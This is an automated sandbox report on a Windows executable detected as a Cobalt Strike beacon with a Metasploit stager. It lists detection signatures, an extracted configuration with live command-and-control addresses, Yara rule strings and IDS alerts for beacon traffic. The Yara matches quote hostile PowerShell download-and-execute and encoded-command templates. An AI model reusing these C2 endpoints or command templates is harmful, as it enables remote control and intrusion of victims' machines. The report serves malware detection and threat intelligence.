Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
JP1KbvjWcM.exe

Overview

General Information

Sample name:JP1KbvjWcM.exe
renamed because original name is a hash value
Original sample name:553ab6275ae084f4587840c55a7a2eeb.exe
Analysis ID:1584584
MD5:553ab6275ae084f4587840c55a7a2eeb
SHA1:2c237cb58b4c27b0771e769e4d47fa19b6ad8601
SHA256:8e550081d6ce27ae8e45a5d8d9af5088e9b1f725ea6eadc47cda7b223f078ea7
Tags:CobaltStrikeexeuser-abuse_ch
Infos:

Detection

CobaltStrike, Metasploit
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected CobaltStrike
Yara detected Metasploit Payload
Yara detected Powershell download and execute
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Contains functionality to detect sleep reduction / modifications
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected TCP or UDP traffic on non-standard ports
Detected non-DNS traffic on DNS port
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found evasive API chain (date check)
Found large amount of non-executed APIs
Internet Provider seen in connection with other malware
May check if the current machine is a sandbox (GetTickCount - Sleep)
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains more sections than normal
PE file contains sections with non-standard names
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • JP1KbvjWcM.exe (PID: 7324 cmdline: "C:\Users\user\Desktop\JP1KbvjWcM.exe" MD5: 553AB6275AE084F4587840C55A7A2EEB)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Cobalt Strike, CobaltStrikeCobalt Strike is a paid penetration testing product that allows an attacker to deploy an agent named 'Beacon' on the victim machine. Beacon includes a wealth of functionality to the attacker, including, but not limited to command execution, key logging, file transfer, SOCKS proxying, privilege escalation, mimikatz, port scanning and lateral movement. Beacon is in-memory/file-less, in that it consists of stageless or multi-stage shellcode that once loaded by exploiting a vulnerability or executing a shellcode loader, will reflectively load itself into the memory of a process without touching the disk. It supports C2 and staging over HTTP, HTTPS, DNS, SMB named pipes as well as forward and reverse TCP; Beacons can be daisy-chained. Cobalt Strike comes with a toolkit for developing shellcode loaders, called Artifact Kit.The Beacon implant has become popular amongst targeted attackers and criminal users as it is well written, stable, and highly customizable.
  • APT 29
  • APT32
  • APT41
  • AQUATIC PANDA
  • Anunak
  • Cobalt
  • Codoso
  • CopyKittens
  • DarkHydrus
  • Earth Baxia
  • FIN6
  • FIN7
  • Leviathan
  • Mustang Panda
  • Shell Crew
  • Stone Panda
  • TianWu
  • UNC1878
  • UNC2452
  • Winnti Umbrella
https://malpedia.caad.fkie.fraunhofer.de/details/win.cobalt_strike
{"C2Server": "http://03.19.190.184:4436/Ld3z", "User Agent": "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Trident/4.0)\r\n"}
{"Headers": "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Trident/4.0)\r\n", "Type": "Metasploit Download", "URL": "http://103.19.190.184/Ld3z"}
SourceRuleDescriptionAuthorStrings
00000000.00000002.2911695185.00000265B0220000.00000040.00000020.00020000.00000000.sdmpJoeSecurity_MetasploitPayload_3Yara detected Metasploit PayloadJoe Security
    00000000.00000002.2911695185.00000265B0220000.00000040.00000020.00020000.00000000.sdmpJoeSecurity_CobaltStrike_3Yara detected CobaltStrikeJoe Security
      00000000.00000002.2911695185.00000265B0220000.00000040.00000020.00020000.00000000.sdmpWindows_Trojan_Metasploit_7bc0f998Identifies the API address lookup function leverage by metasploit shellcodeunknown
      • 0x871:$a1: 48 31 D2 65 48 8B 52 60 48 8B 52 18 48 8B 52 20 48 8B 72 50 48 0F B7 4A 4A 4D 31 C9 48 31 C0 AC 3C 61
      00000000.00000002.2911695185.00000265B0220000.00000040.00000020.00020000.00000000.sdmpWindows_Trojan_Metasploit_c9773203Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families.unknown
      • 0x8dd:$a: 48 31 C0 AC 41 C1 C9 0D 41 01 C1 38 E0 75 F1 4C 03 4C 24 08 45 39 D1
      00000000.00000002.2911591072.00000265B01A0000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_CobaltStrikeYara detected CobaltStrikeJoe Security
        Click to see the 28 entries
        SourceRuleDescriptionAuthorStrings
        0.2.JP1KbvjWcM.exe.265b01a0000.0.raw.unpackJoeSecurity_CobaltStrikeYara detected CobaltStrikeJoe Security
          0.2.JP1KbvjWcM.exe.265b01a0000.0.raw.unpackJoeSecurity_CobaltStrike_3Yara detected CobaltStrikeJoe Security
            0.2.JP1KbvjWcM.exe.265b01a0000.0.raw.unpackWindows_Trojan_CobaltStrike_ee756db7Attempts to detect Cobalt Strike based on strings found in BEACONunknown
            • 0x329a3:$a1: %s.4%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s
            • 0x32a1b:$a2: %s.3%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s
            • 0x33180:$a3: ppid %d is in a different desktop session (spawned jobs may fail). Use 'ppid' to reset.
            • 0x334b2:$a4: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/'); %s
            • 0x33444:$a5: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/')
            • 0x334b2:$a5: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/')
            • 0x32a7e:$a6: %s.2%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s
            • 0x32c0f:$a7: could not run command (w/ token) because of its length of %d bytes!
            • 0x32ac4:$a8: %s.2%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x.%x%x.%s
            • 0x32b02:$a9: %s.2%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x.%x%x.%s
            • 0x334fc:$a10: powershell -nop -exec bypass -EncodedCommand "%s"
            • 0x32d6a:$a11: Could not open service control manager on %s: %d
            • 0x3329c:$a12: %d is an x64 process (can't inject x86 content)
            • 0x332cc:$a13: %d is an x86 process (can't inject x64 content)
            • 0x335ed:$a14: Failed to impersonate logged on user %d (%u)
            • 0x33255:$a15: could not create remote thread in %d: %d
            • 0x32b38:$a16: %s.1%08x%08x%08x%08x%08x%08x%08x.%x%x.%s
            • 0x33203:$a17: could not write to process memory: %d
            • 0x32d9b:$a18: Could not create service %s on %s: %d
            • 0x32e24:$a19: Could not delete service %s on %s: %d
            • 0x32c89:$a20: Could not open process token: %d (%u)
            0.2.JP1KbvjWcM.exe.265b01a0000.0.raw.unpackWindows_Trojan_CobaltStrike_663fc95dIdentifies CobaltStrike via unidentified function codeunknown
            • 0x1d93c:$a: 48 89 5C 24 08 57 48 83 EC 20 48 8B 59 10 48 8B F9 48 8B 49 08 FF 17 33 D2 41 B8 00 80 00 00
            0.2.JP1KbvjWcM.exe.265b01a0000.0.raw.unpackWindows_Trojan_CobaltStrike_f0b627fcRule for beacon reflective loaderunknown
            • 0x1956a:$beacon_loader_x64: 25 FF FF FF 00 3D 41 41 41 00 75 1A 8B 44 24 78 25 FF FF FF 00 3D 42 42 42 00 75
            • 0x1a89b:$beacon_loader_x64: 25 FF FF FF 00 3D 41 41 41 00 75 1A 8B 44 24 78 25 FF FF FF 00 3D 42 42 42 00 75
            Click to see the 18 entries
            No Sigma rule has matched
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-01-05T23:01:59.603758+010020287653Unknown Traffic192.168.2.449731103.19.190.1844436TCP
            2025-01-05T23:02:03.786403+010020287653Unknown Traffic192.168.2.449733103.19.190.1844436TCP
            2025-01-05T23:02:05.623140+010020287653Unknown Traffic192.168.2.449734103.19.190.1844436TCP
            2025-01-05T23:02:07.393755+010020287653Unknown Traffic192.168.2.449735103.19.190.1844436TCP
            2025-01-05T23:02:09.235025+010020287653Unknown Traffic192.168.2.449736103.19.190.1844436TCP
            2025-01-05T23:02:11.011611+010020287653Unknown Traffic192.168.2.449737103.19.190.1844436TCP
            2025-01-05T23:02:12.823659+010020287653Unknown Traffic192.168.2.449738103.19.190.1844436TCP
            2025-01-05T23:02:14.627202+010020287653Unknown Traffic192.168.2.449739103.19.190.1844436TCP
            2025-01-05T23:02:16.431757+010020287653Unknown Traffic192.168.2.449742103.19.190.1844436TCP
            2025-01-05T23:02:18.201963+010020287653Unknown Traffic192.168.2.449747103.19.190.1844436TCP
            2025-01-05T23:02:19.969502+010020287653Unknown Traffic192.168.2.452090103.19.190.1844436TCP
            2025-01-05T23:02:21.557229+010020287653Unknown Traffic192.168.2.460047103.19.190.1844436TCP
            2025-01-05T23:02:23.332157+010020287653Unknown Traffic192.168.2.460050103.19.190.1844436TCP
            2025-01-05T23:02:25.106531+010020287653Unknown Traffic192.168.2.460052103.19.190.1844436TCP
            2025-01-05T23:02:26.891283+010020287653Unknown Traffic192.168.2.460055103.19.190.1844436TCP
            2025-01-05T23:02:28.699749+010020287653Unknown Traffic192.168.2.460056103.19.190.1844436TCP
            2025-01-05T23:02:30.536325+010020287653Unknown Traffic192.168.2.460057103.19.190.1844436TCP
            2025-01-05T23:02:32.410674+010020287653Unknown Traffic192.168.2.460058103.19.190.1844436TCP
            2025-01-05T23:02:34.227081+010020287653Unknown Traffic192.168.2.460059103.19.190.1844436TCP
            2025-01-05T23:02:36.014165+010020287653Unknown Traffic192.168.2.460060103.19.190.1844436TCP
            2025-01-05T23:02:37.793251+010020287653Unknown Traffic192.168.2.460061103.19.190.1844436TCP
            2025-01-05T23:02:39.545662+010020287653Unknown Traffic192.168.2.460062103.19.190.1844436TCP
            2025-01-05T23:02:41.441832+010020287653Unknown Traffic192.168.2.460063103.19.190.1844436TCP
            2025-01-05T23:02:43.266786+010020287653Unknown Traffic192.168.2.460064103.19.190.1844436TCP
            2025-01-05T23:02:45.205863+010020287653Unknown Traffic192.168.2.460065103.19.190.1844436TCP
            2025-01-05T23:02:46.965747+010020287653Unknown Traffic192.168.2.460066103.19.190.1844436TCP
            2025-01-05T23:02:48.724031+010020287653Unknown Traffic192.168.2.460067103.19.190.1844436TCP
            2025-01-05T23:02:50.530591+010020287653Unknown Traffic192.168.2.460068103.19.190.1844436TCP
            2025-01-05T23:02:52.347527+010020287653Unknown Traffic192.168.2.460069103.19.190.1844436TCP
            2025-01-05T23:02:54.167621+010020287653Unknown Traffic192.168.2.460070103.19.190.1844436TCP
            2025-01-05T23:02:55.975591+010020287653Unknown Traffic192.168.2.460071103.19.190.1844436TCP
            2025-01-05T23:02:57.892289+010020287653Unknown Traffic192.168.2.460072103.19.190.1844436TCP
            2025-01-05T23:02:59.672608+010020287653Unknown Traffic192.168.2.460079103.19.190.1844436TCP
            2025-01-05T23:03:01.505346+010020287653Unknown Traffic192.168.2.460090103.19.190.1844436TCP
            2025-01-05T23:03:03.279739+010020287653Unknown Traffic192.168.2.460106103.19.190.1844436TCP
            2025-01-05T23:03:05.028510+010020287653Unknown Traffic192.168.2.460117103.19.190.1844436TCP
            2025-01-05T23:03:06.787605+010020287653Unknown Traffic192.168.2.460126103.19.190.1844436TCP
            2025-01-05T23:03:08.572683+010020287653Unknown Traffic192.168.2.460136103.19.190.1844436TCP
            2025-01-05T23:03:10.339222+010020287653Unknown Traffic192.168.2.460150103.19.190.1844436TCP
            2025-01-05T23:03:12.129686+010020287653Unknown Traffic192.168.2.460163103.19.190.1844436TCP
            2025-01-05T23:03:13.933920+010020287653Unknown Traffic192.168.2.460175103.19.190.1844436TCP
            2025-01-05T23:03:15.724059+010020287653Unknown Traffic192.168.2.460189103.19.190.1844436TCP
            2025-01-05T23:03:17.498949+010020287653Unknown Traffic192.168.2.460200103.19.190.1844436TCP
            2025-01-05T23:03:19.165639+010020287653Unknown Traffic192.168.2.460207103.19.190.1844436TCP
            2025-01-05T23:03:20.927163+010020287653Unknown Traffic192.168.2.460220103.19.190.1844436TCP
            2025-01-05T23:03:22.713365+010020287653Unknown Traffic192.168.2.460232103.19.190.1844436TCP
            2025-01-05T23:03:24.526638+010020287653Unknown Traffic192.168.2.460244103.19.190.1844436TCP
            2025-01-05T23:03:26.320314+010020287653Unknown Traffic192.168.2.460256103.19.190.1844436TCP
            2025-01-05T23:03:28.130833+010020287653Unknown Traffic192.168.2.460270103.19.190.1844436TCP
            2025-01-05T23:03:29.946925+010020287653Unknown Traffic192.168.2.460282103.19.190.1844436TCP
            2025-01-05T23:03:32.006167+010020287653Unknown Traffic192.168.2.460297103.19.190.1844436TCP
            2025-01-05T23:03:33.767331+010020287653Unknown Traffic192.168.2.460308103.19.190.1844436TCP
            2025-01-05T23:03:35.553283+010020287653Unknown Traffic192.168.2.460323103.19.190.1844436TCP
            2025-01-05T23:03:37.385782+010020287653Unknown Traffic192.168.2.460335103.19.190.1844436TCP
            2025-01-05T23:03:39.171778+010020287653Unknown Traffic192.168.2.460347103.19.190.1844436TCP
            2025-01-05T23:03:41.007473+010020287653Unknown Traffic192.168.2.460359103.19.190.1844436TCP
            2025-01-05T23:03:42.809595+010020287653Unknown Traffic192.168.2.460364103.19.190.1844436TCP
            2025-01-05T23:03:44.629614+010020287653Unknown Traffic192.168.2.460365103.19.190.1844436TCP
            2025-01-05T23:03:46.375546+010020287653Unknown Traffic192.168.2.460366103.19.190.1844436TCP
            2025-01-05T23:03:48.163558+010020287653Unknown Traffic192.168.2.460367103.19.190.1844436TCP
            2025-01-05T23:03:49.930369+010020287653Unknown Traffic192.168.2.460368103.19.190.1844436TCP
            2025-01-05T23:03:51.715160+010020287653Unknown Traffic192.168.2.460369103.19.190.1844436TCP
            2025-01-05T23:03:53.718995+010020287653Unknown Traffic192.168.2.460370103.19.190.1844436TCP
            2025-01-05T23:03:55.491219+010020287653Unknown Traffic192.168.2.460371103.19.190.1844436TCP
            2025-01-05T23:03:57.049787+010020287653Unknown Traffic192.168.2.460372103.19.190.1844436TCP
            2025-01-05T23:03:58.858003+010020287653Unknown Traffic192.168.2.460373103.19.190.1844436TCP
            2025-01-05T23:04:00.643548+010020287653Unknown Traffic192.168.2.460374103.19.190.1844436TCP
            2025-01-05T23:04:02.680495+010020287653Unknown Traffic192.168.2.460375103.19.190.1844436TCP
            2025-01-05T23:04:04.460530+010020287653Unknown Traffic192.168.2.460376103.19.190.1844436TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-01-05T23:02:01.034309+010020356511A Network Trojan was detected103.19.190.1844436192.168.2.449731TCP

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Source: 00000000.00000002.2911695185.00000265B0220000.00000040.00000020.00020000.00000000.sdmpMalware Configuration Extractor: CobaltStrike {"C2Server": "http://03.19.190.184:4436/Ld3z", "User Agent": "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Trident/4.0)\r\n"}
            Source: 00000000.00000002.2911695185.00000265B0220000.00000040.00000020.00020000.00000000.sdmpMalware Configuration Extractor: Metasploit {"Headers": "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Trident/4.0)\r\n", "Type": "Metasploit Download", "URL": "http://103.19.190.184/Ld3z"}
            Source: JP1KbvjWcM.exeReversingLabs: Detection: 68%
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
            Source: C:\Users\user\Desktop\JP1KbvjWcM.exeCode function: 0_2_00000265B01A1184 CryptAcquireContextA,CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,0_2_00000265B01A1184
            Source: C:\Users\user\Desktop\JP1KbvjWcM.exeCode function: 0_2_00000265B01D2020 CryptGenRandom,0_2_00000265B01D2020
            Source: JP1KbvjWcM.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT
            Source: C:\Users\user\Desktop\JP1KbvjWcM.exeCode function: 0_2_00000265B01B9220 malloc,_snprintf,FindFirstFileA,free,malloc,_snprintf,free,FindNextFileA,FindClose,0_2_00000265B01B9220
            Source: C:\Users\user\Desktop\JP1KbvjWcM.exeCode function: 0_2_00000265B01B1C30 malloc,GetCurrentDirectoryA,FindFirstFileA,GetLastError,free,free,FileTimeToSystemTime,SystemTimeToTzSpecificLocalTime,FindNextFileA,FindClose,0_2_00000265B01B1C30

            Networking

            barindex
            Source: Network trafficSuricata IDS: 2035651 - Severity 1 - ET MALWARE Meterpreter or Other Reverse Shell SSL Cert : 103.19.190.184:4436 -> 192.168.2.4:49731
            Source: Malware configuration extractorURLs: http://03.19.190.184:4436/Ld3z
            Source: Malware configuration extractorURLs: http://103.19.190.184/Ld3z
            Source: global trafficTCP traffic: 192.168.2.4:49731 -> 103.19.190.184:4436
            Source: global trafficTCP traffic: 192.168.2.4:52089 -> 1.1.1.1:53
            Source: global trafficTCP traffic: 192.168.2.4:60046 -> 1.1.1.1:53
            Source: Joe Sandbox ViewASN Name: SUNHK-DATA-AS-APSunNetworkHongKongLimited-HongKong SUNHK-DATA-AS-APSunNetworkHongKongLimited-HongKong
            Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49731 -> 103.19.190.184:4436
            Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49736 -> 103.19.190.184:4436
            Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49734 -> 103.19.190.184:4436
            Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49733 -> 103.19.190.184:4436
            Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49735 -> 103.19.190.184:4436
            Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49737 -> 103.19.190.184:4436
            Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49747 -> 103.19.190.184:4436
            Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:52090 -> 103.19.190.184:4436
            Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49742 -> 103.19.190.184:4436
            Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:60059 -> 103.19.190.184:4436
            Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:60047 -> 103.19.190.184:4436
            Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:60066 -> 103.19.190.184:4436
            Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:60064 -> 103.19.190.184:4436
            Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:60065 -> 103.19.190.184:4436
            Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:60063 -> 103.19.190.184:4436
            Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49738 -> 103.19.190.184:4436
            Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:60062 -> 103.19.190.184:4436
            Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:60071 -> 103.19.190.184:4436
            Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:60058 -> 103.19.190.184:4436
            Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:60106 -> 103.19.190.184:4436
            Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:60079 -> 103.19.190.184:4436
            Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:60072 -> 103.19.190.184:4436
            Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:60050 -> 103.19.190.184:4436
            Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:60052 -> 103.19.190.184:4436
            Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:60055 -> 103.19.190.184:4436
            Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49739 -> 103.19.190.184:4436
            Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:60068 -> 103.19.190.184:4436
            Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:60117 -> 103.19.190.184:4436
            Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:60057 -> 103.19.190.184:4436
            Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:60090 -> 103.19.190.184:4436
            Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:60069 -> 103.19.190.184:4436
            Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:60126 -> 103.19.190.184:4436
            Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:60060 -> 103.19.190.184:4436
            Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:60056 -> 103.19.190.184:4436
            Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:60061 -> 103.19.190.184:4436
            Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:60136 -> 103.19.190.184:4436
            Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:60189 -> 103.19.190.184:4436
            Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:60067 -> 103.19.190.184:4436
            Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:60207 -> 103.19.190.184:4436
            Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:60070 -> 103.19.190.184:4436
            Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:60200 -> 103.19.190.184:4436
            Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:60220 -> 103.19.190.184:4436
            Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:60232 -> 103.19.190.184:4436
            Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:60163 -> 103.19.190.184:4436
            Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:60244 -> 103.19.190.184:4436
            Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:60175 -> 103.19.190.184:4436
            Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:60256 -> 103.19.190.184:4436
            Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:60150 -> 103.19.190.184:4436
            Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:60270 -> 103.19.190.184:4436
            Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:60282 -> 103.19.190.184:4436
            Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:60308 -> 103.19.190.184:4436
            Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:60297 -> 103.19.190.184:4436
            Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:60323 -> 103.19.190.184:4436
            Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:60335 -> 103.19.190.184:4436
            Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:60347 -> 103.19.190.184:4436
            Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:60359 -> 103.19.190.184:4436
            Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:60364 -> 103.19.190.184:4436
            Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:60365 -> 103.19.190.184:4436
            Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:60367 -> 103.19.190.184:4436
            Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:60368 -> 103.19.190.184:4436
            Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:60370 -> 103.19.190.184:4436
            Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:60371 -> 103.19.190.184:4436
            Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:60366 -> 103.19.190.184:4436
            Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:60376 -> 103.19.190.184:4436
            Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:60373 -> 103.19.190.184:4436
            Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:60369 -> 103.19.190.184:4436
            Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:60374 -> 103.19.190.184:4436
            Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:60372 -> 103.19.190.184:4436
            Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:60375 -> 103.19.190.184:4436
            Source: unknownTCP traffic detected without corresponding DNS query: 103.19.190.184
            Source: unknownTCP traffic detected without corresponding DNS query: 103.19.190.184
            Source: unknownTCP traffic detected without corresponding DNS query: 103.19.190.184
            Source: unknownTCP traffic detected without corresponding DNS query: 103.19.190.184
            Source: unknownTCP traffic detected without corresponding DNS query: 103.19.190.184
            Source: unknownTCP traffic detected without corresponding DNS query: 103.19.190.184
            Source: unknownTCP traffic detected without corresponding DNS query: 103.19.190.184
            Source: unknownTCP traffic detected without corresponding DNS query: 103.19.190.184
            Source: unknownTCP traffic detected without corresponding DNS query: 103.19.190.184
